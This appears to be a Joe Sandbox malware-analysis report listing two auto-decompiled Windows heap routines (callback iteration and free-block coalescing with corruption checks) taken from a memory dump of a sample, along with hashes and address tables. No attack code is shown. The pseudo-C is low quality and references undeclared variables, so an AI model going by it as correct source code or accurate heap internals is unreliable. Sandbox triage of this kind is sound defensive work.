                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                                              • API String ID: 0-4256168463
                                                                                                                              • Opcode ID: 110202374d1abf10426068ffefcaf61141242cd3eeb75716c3de10f3f7c50df1
                                                                                                                              • Instruction ID: b53b00bf36e25c0c4c0a836d3b3695b58abf9e26a8fd5ac863c9bf18f8866eb0
                                                                                                                              • Opcode Fuzzy Hash: 110202374d1abf10426068ffefcaf61141242cd3eeb75716c3de10f3f7c50df1
                                                                                                                              • Instruction Fuzzy Hash: 3601F53B544660EFCB12DB74D848FEAB3A9EF416B0F028456E4019B752DA34F904C693
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7E7ABE Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 54%
                                                                                                                              			E1D7E7ABE(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				signed char _t60;
				intOrPtr _t69;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				void* _t78;

				_t69 = __edx;
				_push(0x1c);
				_push(0x1d81d230);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t78 - 0x24)) = __edx;
				 *((intOrPtr*)(_t78 - 0x1c)) = __ecx;
				_t45 =  *[fs:0x30];
				 *((intOrPtr*)(_t78 - 0x2c)) = _t45;
				_t75 = 0;
				 *((intOrPtr*)(_t78 - 0x28)) = 0;
				_t60 =  *(_t78 + 8);
				if((_t60 & 0x00000001) == 0) {
					E1D74FED0(0x1d834800);
					_t45 =  *((intOrPtr*)(_t78 - 0x2c));
					_t69 =  *((intOrPtr*)(_t78 - 0x24));
				}
				 *(_t78 - 4) = _t75;
				_t71 = _t75;
				 *(_t78 - 0x20) = _t71;
				while(_t71 <  *((intOrPtr*)(_t45 + 0x88))) {
					 *0x1d8391e0( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x90)) + _t71 * 4)), _t69);
					_t57 =  *((intOrPtr*)(_t78 - 0x1c))();
					 *((intOrPtr*)(_t78 - 0x28)) = _t57;
					if(_t57 >= 0) {
						_t71 = _t71 + 1;
						 *(_t78 - 0x20) = _t71;
						_t45 =  *((intOrPtr*)(_t78 - 0x2c));
						_t69 =  *((intOrPtr*)(_t78 - 0x24));
						continue;
					}
					L15:
					 *(_t78 - 4) = 0xfffffffe;
					E1D7E7BC1(_t60);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0x10));
					return  *((intOrPtr*)(_t78 - 0x28));
				}
				if((_t60 & 0x00000002) != 0) {
					_t73 = _t75;
					while(1) {
						 *(_t78 - 0x20) = _t73;
						if(_t73 >= ( *0x1d836624 & 0x0000ffff)) {
							goto L11;
						}
						_t52 =  *0x1d833734; // 0x774b4820
						 *0x1d8391e0( *((intOrPtr*)(_t52 + _t73 * 4)), _t69);
						_t54 =  *((intOrPtr*)(_t78 - 0x1c))();
						 *((intOrPtr*)(_t78 - 0x28)) = _t54;
						if(_t54 >= 0) {
							_t73 = _t73 + 1;
							_t69 =  *((intOrPtr*)(_t78 - 0x24));
							continue;
						}
						goto L15;
					}
					while(1) {
						L11:
						 *(_t78 - 0x20) = _t75;
						if(_t75 >= 3) {
							goto L15;
						}
						_t49 =  *((intOrPtr*)(0x1d838a10 + _t75 * 8));
						 *((intOrPtr*)(_t78 - 0x2c)) = _t49;
						if(_t49 == 0) {
							L14:
							_t75 =  *(_t78 - 0x20) + 1;
							_t69 =  *((intOrPtr*)(_t78 - 0x24));
							continue;
						} else {
							 *0x1d8391e0(_t49, _t69);
							_t51 =  *((intOrPtr*)(_t78 - 0x1c))();
							 *((intOrPtr*)(_t78 - 0x28)) = _t51;
							if(_t51 >= 0) {
								goto L14;
							}
						}
						goto L15;
					}
				}
				goto L15;
			}















                                                                                                                              0x1d7e7abe
                                                                                                                              0x1d7e7abe
                                                                                                                              0x1d7e7ac0
                                                                                                                              0x1d7e7ac5
                                                                                                                              0x1d7e7aca
                                                                                                                              0x1d7e7acd
                                                                                                                              0x1d7e7ad0
                                                                                                                              0x1d7e7ad6
                                                                                                                              0x1d7e7ad9
                                                                                                                              0x1d7e7adb
                                                                                                                              0x1d7e7ade
                                                                                                                              0x1d7e7ae4
                                                                                                                              0x1d7e7aeb
                                                                                                                              0x1d7e7af3
                                                                                                                              0x1d7e7af6
                                                                                                                              0x1d7e7af6
                                                                                                                              0x1d7e7af9
                                                                                                                              0x1d7e7afc
                                                                                                                              0x1d7e7afe
                                                                                                                              0x1d7e7b01
                                                                                                                              0x1d7e7b13
                                                                                                                              0x1d7e7b19
                                                                                                                              0x1d7e7b1c
                                                                                                                              0x1d7e7b21
                                                                                                                              0x1d7e7b23
                                                                                                                              0x1d7e7b24
                                                                                                                              0x1d7e7b2a
                                                                                                                              0x1d7e7b2d
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b2d
                                                                                                                              0x1d7e7b9d
                                                                                                                              0x1d7e7b9d
                                                                                                                              0x1d7e7ba4
                                                                                                                              0x1d7e7baf
                                                                                                                              0x1d7e7bbb
                                                                                                                              0x1d7e7bbb
                                                                                                                              0x1d7e7b35
                                                                                                                              0x1d7e7b37
                                                                                                                              0x1d7e7b39
                                                                                                                              0x1d7e7b39
                                                                                                                              0x1d7e7b45
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b48
                                                                                                                              0x1d7e7b50
                                                                                                                              0x1d7e7b56
                                                                                                                              0x1d7e7b59
                                                                                                                              0x1d7e7b5e
                                                                                                                              0x1d7e7b60
                                                                                                                              0x1d7e7b64
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b64
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b5e
                                                                                                                              0x1d7e7b69
                                                                                                                              0x1d7e7b69
                                                                                                                              0x1d7e7b69
                                                                                                                              0x1d7e7b6f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b71
                                                                                                                              0x1d7e7b78
                                                                                                                              0x1d7e7b7d
                                                                                                                              0x1d7e7b91
                                                                                                                              0x1d7e7b94
                                                                                                                              0x1d7e7b98
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b7f
                                                                                                                              0x1d7e7b81
                                                                                                                              0x1d7e7b87
                                                                                                                              0x1d7e7b8a
                                                                                                                              0x1d7e7b8f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b8f
                                                                                                                              0x00000000
                                                                                                                              0x1d7e7b7d
                                                                                                                              0x1d7e7b69
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 31d022d5e2aa20acff3b87799aa91c6ebc6e9e6e2146ec1f15b7a0e0cb80b1d1
                                                                                                                              • Instruction ID: 6c0a6657e01fb71937b0db8411e6e953443de0c6ead0fd1677ec2985ec21a18f
                                                                                                                              • Opcode Fuzzy Hash: 31d022d5e2aa20acff3b87799aa91c6ebc6e9e6e2146ec1f15b7a0e0cb80b1d1
                                                                                                                              • Instruction Fuzzy Hash: 093112B5E1022A9BCF05DF99C884AEDFBB5BF4C6A0F15842AD815B3351C7349D41CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D751EB2 Relevance: 4.3, Strings: 3, Instructions: 563COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E1D751EB2(signed char __ecx, signed short* __edx, signed int* _a4, char _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t192;
				intOrPtr _t193;
				signed short _t196;
				signed int _t202;
				signed short _t203;
				intOrPtr _t209;
				signed int _t213;
				signed int _t216;
				signed short _t221;
				intOrPtr _t222;
				signed short _t225;
				signed int _t227;
				signed short _t228;
				intOrPtr _t234;
				signed int _t238;
				signed int _t241;
				signed int _t251;
				char _t259;
				signed short _t260;
				intOrPtr _t261;
				signed short _t263;
				intOrPtr _t264;
				signed int _t267;
				signed int _t268;
				signed short _t271;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				intOrPtr _t301;
				signed int _t305;
				signed int _t308;
				signed short* _t319;
				void* _t321;
				signed int* _t323;
				signed short* _t324;
				void* _t325;
				signed short* _t326;
				signed char _t327;
				intOrPtr _t329;
				signed int _t336;
				signed short* _t339;
				signed char _t340;
				intOrPtr _t344;
				signed int _t350;
				signed short* _t355;
				void* _t356;
				signed short* _t357;
				signed short _t358;
				signed char _t360;
				intOrPtr _t362;
				intOrPtr* _t368;
				signed char _t369;
				intOrPtr _t370;
				signed int _t377;
				signed int* _t380;
				signed int _t381;
				signed short _t383;
				signed int _t385;
				signed int _t389;
				signed int* _t390;
				unsigned int _t394;
				signed short _t396;
				signed short _t398;
				signed int _t400;
				signed int _t403;
				signed short* _t409;
				signed int* _t410;
				signed char _t416;
				void* _t418;
				void* _t419;

				_t322 = __ecx;
				_t419 = _t418 - 0x1c;
				_t319 = __edx;
				_t409 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				_t416 = __ecx;
				if(_t409 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t409[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L7:
					_t380 = _a4;
					goto L8;
				} else {
					if( *(__ecx + 0x4c) != 0) {
						 *_t409 =  *_t409 ^  *(__ecx + 0x50);
						if(_t409[1] != (_t409[0] ^  *_t409 ^ _t409[1])) {
							_push(__ecx);
							E1D7FD646(__edx, __ecx, _t409, _t409, __ecx, __eflags);
						}
					}
					_t259 = _a8;
					_v5 = _t259;
					if(_t259 != 0) {
						_t396 = _t319[6];
						_t355 =  &(_t319[4]);
						_t260 =  *_t355;
						_v12 = _t260;
						_v16 = _t396;
						_t261 =  *((intOrPtr*)(_t260 + 4));
						__eflags =  *_t396 - _t261;
						if( *_t396 != _t261) {
							L59:
							_push(0);
							_push( *_t396);
							_push(_t261);
							_push(_t355);
							_t356 = 0xd;
							E1D805FED(_t356, _t416);
							L60:
							_v5 = 0;
							goto L5;
						}
						__eflags =  *_t396 - _t355;
						if( *_t396 != _t355) {
							goto L59;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
						_t403 =  *(_t416 + 0xb4);
						__eflags = _t403;
						if(_t403 == 0) {
							L46:
							_t368 = _v16;
							_t291 = _v12;
							 *_t368 = _t291;
							 *((intOrPtr*)(_t291 + 4)) = _t368;
							__eflags = _t319[1] & 0x00000008;
							if((_t319[1] & 0x00000008) == 0) {
								L49:
								_t369 = _t319[1];
								__eflags = _t369 & 0x00000004;
								if((_t369 & 0x00000004) != 0) {
									_t293 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t293;
									__eflags = _t369 & 0x00000002;
									if((_t369 & 0x00000002) != 0) {
										__eflags = _t293 - 4;
										if(_t293 > 4) {
											_t293 = _t293 - 4;
											__eflags = _t293;
											_v12 = _t293;
										}
									}
									_t295 = E1D7980A0( &(_t319[8]), _t293, 0xfeeefeee);
									_v16 = _t295;
									__eflags = _t295 - _v12;
									if(_t295 != _v12) {
										_t370 =  *[fs:0x30];
										__eflags =  *(_t370 + 0xc);
										if( *(_t370 + 0xc) == 0) {
											_push("HEAP: ");
											E1D73B910();
										} else {
											E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t319);
										E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
										_t301 =  *[fs:0x30];
										_t419 = _t419 + 0xc;
										__eflags =  *((char*)(_t301 + 2));
										if( *((char*)(_t301 + 2)) != 0) {
											 *0x1d8347a1 = 1;
											asm("int3");
											 *0x1d8347a1 = 0;
										}
									}
								}
								goto L60;
							}
							_t305 = E1D73F5C7(_t416, _t319);
							__eflags = _t305;
							if(_t305 != 0) {
								goto L49;
							}
							E1D73F113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
							goto L60;
						}
						_t377 =  *_t319 & 0x0000ffff;
						while(1) {
							__eflags = _t377 -  *((intOrPtr*)(_t403 + 4));
							if(_t377 <  *((intOrPtr*)(_t403 + 4))) {
								break;
							}
							_t308 =  *_t403;
							__eflags = _t308;
							if(_t308 == 0) {
								_t310 =  *((intOrPtr*)(_t403 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t403 + 4)) - 1;
								L45:
								E1D75036A(_t416, _t403, 1,  &(_t319[4]), _t310, _t377);
								goto L46;
							}
							_t403 = _t308;
						}
						_t310 = _t377;
						goto L45;
					}
					L5:
					_t398 = _t409[6];
					_t357 =  &(_t409[4]);
					_t263 =  *_t357;
					_v12 = _t263;
					_v20 = _t398;
					_t264 =  *((intOrPtr*)(_t263 + 4));
					if( *_t398 == _t264) {
						__eflags =  *_t398 - _t357;
						if( *_t398 != _t357) {
							goto L6;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t409 & 0x0000ffff);
						_t400 =  *(_t416 + 0xb4);
						__eflags = _t400;
						if(_t400 == 0) {
							L21:
							_t358 = _v20;
							_t267 = _v12;
							 *_t358 = _t267;
							 *(_t267 + 4) = _t358;
							__eflags = _t409[1] & 0x00000008;
							if((_t409[1] & 0x00000008) != 0) {
								_t268 = E1D73F5C7(_t416, _t409);
								__eflags = _t268;
								if(_t268 != 0) {
									goto L22;
								}
								_t322 = _t416;
								E1D73F113(_t322, _t409,  *_t409 & 0x0000ffff, 1);
								goto L7;
							}
							L22:
							_t360 = _t409[1];
							__eflags = _t360 & 0x00000004;
							if((_t360 & 0x00000004) != 0) {
								_t321 = ( *_t409 & 0x0000ffff) * 8 - 0x10;
								__eflags = _t360 & 0x00000002;
								if((_t360 & 0x00000002) != 0) {
									__eflags = _t321 - 4;
									if(_t321 > 4) {
										_t321 = _t321 - 4;
									}
								}
								_t271 = E1D7980A0( &(_t409[8]), _t321, 0xfeeefeee);
								_v20 = _t271;
								__eflags = _t271 - _t321;
								if(_t271 != _t321) {
									_t362 =  *[fs:0x30];
									__eflags =  *(_t362 + 0xc);
									if( *(_t362 + 0xc) != 0) {
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
										E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									} else {
										_push("HEAP: ");
										E1D73B910();
									}
									_push(_v20 + 0x10 + _t409);
									E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t409);
									_t282 =  *[fs:0x30];
									_t419 = _t419 + 0xc;
									__eflags =  *((char*)(_t282 + 2));
									if( *((char*)(_t282 + 2)) != 0) {
										 *0x1d8347a1 = 1;
										asm("int3");
										 *0x1d8347a1 = 0;
									}
								}
							}
							_t380 = _a4;
							_t319 = _t409;
							_t409[1] = 0;
							_t409[3] = 0;
							 *_t380 =  *_t380 + ( *_t409 & 0x0000ffff);
							 *_t409 =  *_t380;
							_t322 =  *_t380 ^  *(_t416 + 0x54);
							 *(_t409 + 4 +  *_t380 * 8) = _t322;
							L8:
							_t410 = _t319 +  *_t380 * 8;
							if( *(_t416 + 0x4c) == 0) {
								L10:
								while((( *(_t416 + 0x4c) >> 0x00000014 &  *(_t416 + 0x52) ^ _t410[0]) & 0x00000001) == 0) {
									__eflags =  *(_t416 + 0x4c);
									if( *(_t416 + 0x4c) != 0) {
										 *_t410 =  *_t410 ^  *(_t416 + 0x50);
										__eflags = _t410[0] - (_t410[0] ^  *_t410 ^ _t410[0]);
										if(__eflags != 0) {
											_push(_t322);
											E1D7FD646(_t319, _t416, _t410, _t410, _t416, __eflags);
										}
									}
									__eflags = _v5;
									if(_v5 == 0) {
										L94:
										_t381 = _t410[3];
										_t323 =  &(_t410[2]);
										_t192 =  *_t323;
										_v20 = _t192;
										_v16 = _t381;
										_t193 =  *((intOrPtr*)(_t192 + 4));
										__eflags =  *_t381 - _t193;
										if( *_t381 != _t193) {
											L63:
											_push(0);
											_push( *_t381);
											_push(_t193);
											_push(_t323);
											_push(0xd);
											L64:
											_pop(_t322);
											E1D805FED(_t322, _t416);
											continue;
										}
										__eflags =  *_t381 - _t323;
										if( *_t381 != _t323) {
											goto L63;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t410 & 0x0000ffff);
										_t389 =  *(_t416 + 0xb4);
										__eflags = _t389;
										if(_t389 == 0) {
											L104:
											_t339 = _v16;
											_t196 = _v20;
											 *_t339 = _t196;
											 *(_t196 + 4) = _t339;
											__eflags = _t410[0] & 0x00000008;
											if((_t410[0] & 0x00000008) == 0) {
												L107:
												_t340 = _t410[0];
												__eflags = _t340 & 0x00000004;
												if((_t340 & 0x00000004) != 0) {
													_t202 = ( *_t410 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t202;
													__eflags = _t340 & 0x00000002;
													if((_t340 & 0x00000002) != 0) {
														__eflags = _t202 - 4;
														if(_t202 > 4) {
															_t202 = _t202 - 4;
															__eflags = _t202;
															_v12 = _t202;
														}
													}
													_t203 = E1D7980A0( &(_t410[4]), _t202, 0xfeeefeee);
													_v20 = _t203;
													__eflags = _t203 - _v12;
													if(_t203 != _v12) {
														_t344 =  *[fs:0x30];
														__eflags =  *(_t344 + 0xc);
														if( *(_t344 + 0xc) == 0) {
															_push("HEAP: ");
															E1D73B910();
														} else {
															E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t410);
														E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t410);
														_t209 =  *[fs:0x30];
														__eflags =  *((char*)(_t209 + 2));
														if( *((char*)(_t209 + 2)) != 0) {
															 *0x1d8347a1 = 1;
															asm("int3");
															 *0x1d8347a1 = 0;
														}
													}
												}
												_t390 = _a4;
												_t319[1] = 0;
												_t319[3] = 0;
												 *_t390 =  *_t390 + ( *_t410 & 0x0000ffff);
												 *_t319 =  *_t390;
												 *(_t319 + 4 +  *_t390 * 8) =  *_t390 ^  *(_t416 + 0x54);
												break;
											}
											_t213 = E1D73F5C7(_t416, _t410);
											__eflags = _t213;
											if(_t213 != 0) {
												goto L107;
											}
											_t322 = _t416;
											E1D73F113(_t322, _t410,  *_t410 & 0x0000ffff, 1);
											continue;
										}
										_t350 =  *_t410 & 0x0000ffff;
										while(1) {
											__eflags = _t350 -  *((intOrPtr*)(_t389 + 4));
											if(_t350 <  *((intOrPtr*)(_t389 + 4))) {
												break;
											}
											_t216 =  *_t389;
											__eflags = _t216;
											if(_t216 == 0) {
												_t218 =  *((intOrPtr*)(_t389 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t389 + 4)) - 1;
												L103:
												E1D75036A(_t416, _t389, 1,  &(_t410[2]), _t218, _t350);
												goto L104;
											}
											_t389 = _t216;
										}
										_t218 = _t350;
										goto L103;
									} else {
										_t383 = _t319[6];
										_t324 =  &(_t319[4]);
										_t221 =  *_t324;
										_v20 = _t221;
										_v16 = _t383;
										_t222 =  *((intOrPtr*)(_t221 + 4));
										__eflags =  *_t383 - _t222;
										if( *_t383 != _t222) {
											L92:
											_push(0);
											_push( *_t383);
											_push(_t222);
											_push(_t324);
											_t325 = 0xd;
											E1D805FED(_t325, _t416);
											L93:
											_v5 = 0;
											goto L94;
										}
										__eflags =  *_t383 - _t324;
										if( *_t383 != _t324) {
											goto L92;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
										_t385 =  *(_t416 + 0xb4);
										__eflags = _t385;
										if(_t385 == 0) {
											L79:
											_t326 = _v16;
											_t225 = _v20;
											 *_t326 = _t225;
											 *(_t225 + 4) = _t326;
											__eflags = _t319[1] & 0x00000008;
											if((_t319[1] & 0x00000008) == 0) {
												L82:
												_t327 = _t319[1];
												__eflags = _t327 & 0x00000004;
												if((_t327 & 0x00000004) != 0) {
													_t227 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t227;
													__eflags = _t327 & 0x00000002;
													if((_t327 & 0x00000002) != 0) {
														__eflags = _t227 - 4;
														if(_t227 > 4) {
															_t227 = _t227 - 4;
															__eflags = _t227;
															_v12 = _t227;
														}
													}
													_t228 = E1D7980A0( &(_t319[8]), _t227, 0xfeeefeee);
													_v20 = _t228;
													__eflags = _t228 - _v12;
													if(_t228 != _v12) {
														_t329 =  *[fs:0x30];
														__eflags =  *(_t329 + 0xc);
														if( *(_t329 + 0xc) == 0) {
															_push("HEAP: ");
															E1D73B910();
														} else {
															E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t319);
														E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
														_t234 =  *[fs:0x30];
														_t419 = _t419 + 0xc;
														__eflags =  *((char*)(_t234 + 2));
														if( *((char*)(_t234 + 2)) != 0) {
															 *0x1d8347a1 = 1;
															asm("int3");
															 *0x1d8347a1 = 0;
														}
													}
												}
												goto L93;
											}
											_t238 = E1D73F5C7(_t416, _t319);
											__eflags = _t238;
											if(_t238 != 0) {
												goto L82;
											}
											E1D73F113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
											goto L93;
										}
										_t336 =  *_t319 & 0x0000ffff;
										while(1) {
											__eflags = _t336 -  *((intOrPtr*)(_t385 + 4));
											if(_t336 <  *((intOrPtr*)(_t385 + 4))) {
												break;
											}
											_t241 =  *_t385;
											__eflags = _t241;
											if(_t241 == 0) {
												_t243 =  *((intOrPtr*)(_t385 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t385 + 4)) - 1;
												L78:
												E1D75036A(_t416, _t385, 1,  &(_t319[4]), _t243, _t336);
												goto L79;
											}
											_t385 = _t241;
										}
										_t243 = _t336;
										goto L78;
									}
								}
								return _t319;
							}
							_t251 =  *_t410;
							_t394 =  *(_t416 + 0x50) ^ _t251;
							_v28 = _t251;
							_v28 = _t394;
							_t322 = _t394 >> 0x00000010 ^ _t394 >> 0x00000008 ^ _t394;
							if(_t394 >> 0x18 != _t322) {
								_push(0);
								_push(0);
								_push(0);
								_push(_t410);
								_push(3);
								goto L64;
							}
							goto L10;
						} else {
							_t286 =  *_t409 & 0x0000ffff;
							_v16 = _t286;
							while(1) {
								__eflags = _t286 -  *((intOrPtr*)(_t400 + 4));
								if(_t286 <  *((intOrPtr*)(_t400 + 4))) {
									break;
								}
								_t288 =  *_t400;
								__eflags = _t288;
								if(_t288 == 0) {
									_t286 =  *((intOrPtr*)(_t400 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t400 + 4)) - 1;
									break;
								} else {
									_t400 = _t288;
									_t286 =  *_t409 & 0x0000ffff;
									continue;
								}
							}
							E1D75036A(_t416, _t400, 1, _t357, _t286, _v16);
							goto L21;
						}
					}
					L6:
					_push(0);
					_push( *_t398);
					_push(_t264);
					_push(_t357);
					_t322 = 0xd;
					E1D805FED(_t322, _t416);
					goto L7;
				}
			}




















































































                                                                                                                              0x1d751eb2
                                                                                                                              0x1d751ebb
                                                                                                                              0x1d751ebf
                                                                                                                              0x1d751ece
                                                                                                                              0x1d751ed0
                                                                                                                              0x1d751ed4
                                                                                                                              0x1d751f91
                                                                                                                              0x1d751f3d
                                                                                                                              0x1d751f3d
                                                                                                                              0x00000000
                                                                                                                              0x1d751eee
                                                                                                                              0x1d751ef2
                                                                                                                              0x1d751ef7
                                                                                                                              0x1d751f04
                                                                                                                              0x1d7a5b5c
                                                                                                                              0x1d7a5b5f
                                                                                                                              0x1d7a5b5f
                                                                                                                              0x1d751f04
                                                                                                                              0x1d751f0a
                                                                                                                              0x1d751f0d
                                                                                                                              0x1d751f12
                                                                                                                              0x1d7a5b69
                                                                                                                              0x1d7a5b6c
                                                                                                                              0x1d7a5b6f
                                                                                                                              0x1d7a5b71
                                                                                                                              0x1d7a5b74
                                                                                                                              0x1d7a5b77
                                                                                                                              0x1d7a5b7a
                                                                                                                              0x1d7a5b7c
                                                                                                                              0x1d7a5c9f
                                                                                                                              0x1d7a5c9f
                                                                                                                              0x1d7a5ca1
                                                                                                                              0x1d7a5ca5
                                                                                                                              0x1d7a5ca6
                                                                                                                              0x1d7a5ca9
                                                                                                                              0x1d7a5caa
                                                                                                                              0x1d7a5caf
                                                                                                                              0x1d7a5caf
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5caf
                                                                                                                              0x1d7a5b82
                                                                                                                              0x1d7a5b84
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5b8d
                                                                                                                              0x1d7a5b90
                                                                                                                              0x1d7a5b96
                                                                                                                              0x1d7a5b98
                                                                                                                              0x1d7a5bc3
                                                                                                                              0x1d7a5bc3
                                                                                                                              0x1d7a5bc6
                                                                                                                              0x1d7a5bc9
                                                                                                                              0x1d7a5bcb
                                                                                                                              0x1d7a5bce
                                                                                                                              0x1d7a5bd2
                                                                                                                              0x1d7a5bf5
                                                                                                                              0x1d7a5bf5
                                                                                                                              0x1d7a5bf8
                                                                                                                              0x1d7a5bfb
                                                                                                                              0x1d7a5c04
                                                                                                                              0x1d7a5c0b
                                                                                                                              0x1d7a5c0e
                                                                                                                              0x1d7a5c11
                                                                                                                              0x1d7a5c13
                                                                                                                              0x1d7a5c16
                                                                                                                              0x1d7a5c18
                                                                                                                              0x1d7a5c18
                                                                                                                              0x1d7a5c1b
                                                                                                                              0x1d7a5c1b
                                                                                                                              0x1d7a5c16
                                                                                                                              0x1d7a5c28
                                                                                                                              0x1d7a5c2d
                                                                                                                              0x1d7a5c30
                                                                                                                              0x1d7a5c33
                                                                                                                              0x1d7a5c35
                                                                                                                              0x1d7a5c3c
                                                                                                                              0x1d7a5c40
                                                                                                                              0x1d7a5c60
                                                                                                                              0x1d7a5c65
                                                                                                                              0x1d7a5c42
                                                                                                                              0x1d7a5c58
                                                                                                                              0x1d7a5c5d
                                                                                                                              0x1d7a5c73
                                                                                                                              0x1d7a5c7a
                                                                                                                              0x1d7a5c7f
                                                                                                                              0x1d7a5c85
                                                                                                                              0x1d7a5c88
                                                                                                                              0x1d7a5c8c
                                                                                                                              0x1d7a5c8e
                                                                                                                              0x1d7a5c95
                                                                                                                              0x1d7a5c96
                                                                                                                              0x1d7a5c96
                                                                                                                              0x1d7a5c8c
                                                                                                                              0x1d7a5c33
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5bfb
                                                                                                                              0x1d7a5bd8
                                                                                                                              0x1d7a5bdd
                                                                                                                              0x1d7a5bdf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5beb
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5beb
                                                                                                                              0x1d7a5b9a
                                                                                                                              0x1d7a5ba7
                                                                                                                              0x1d7a5ba7
                                                                                                                              0x1d7a5baa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5b9f
                                                                                                                              0x1d7a5ba1
                                                                                                                              0x1d7a5ba3
                                                                                                                              0x1d7a5bb3
                                                                                                                              0x1d7a5bb3
                                                                                                                              0x1d7a5bb4
                                                                                                                              0x1d7a5bbe
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5bbe
                                                                                                                              0x1d7a5ba5
                                                                                                                              0x1d7a5ba5
                                                                                                                              0x1d7a5bac
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5bac
                                                                                                                              0x1d751f18
                                                                                                                              0x1d751f18
                                                                                                                              0x1d751f1b
                                                                                                                              0x1d751f1e
                                                                                                                              0x1d751f20
                                                                                                                              0x1d751f23
                                                                                                                              0x1d751f26
                                                                                                                              0x1d751f2b
                                                                                                                              0x1d751f96
                                                                                                                              0x1d751f98
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d751f9d
                                                                                                                              0x1d751fa0
                                                                                                                              0x1d751fa6
                                                                                                                              0x1d751fa8
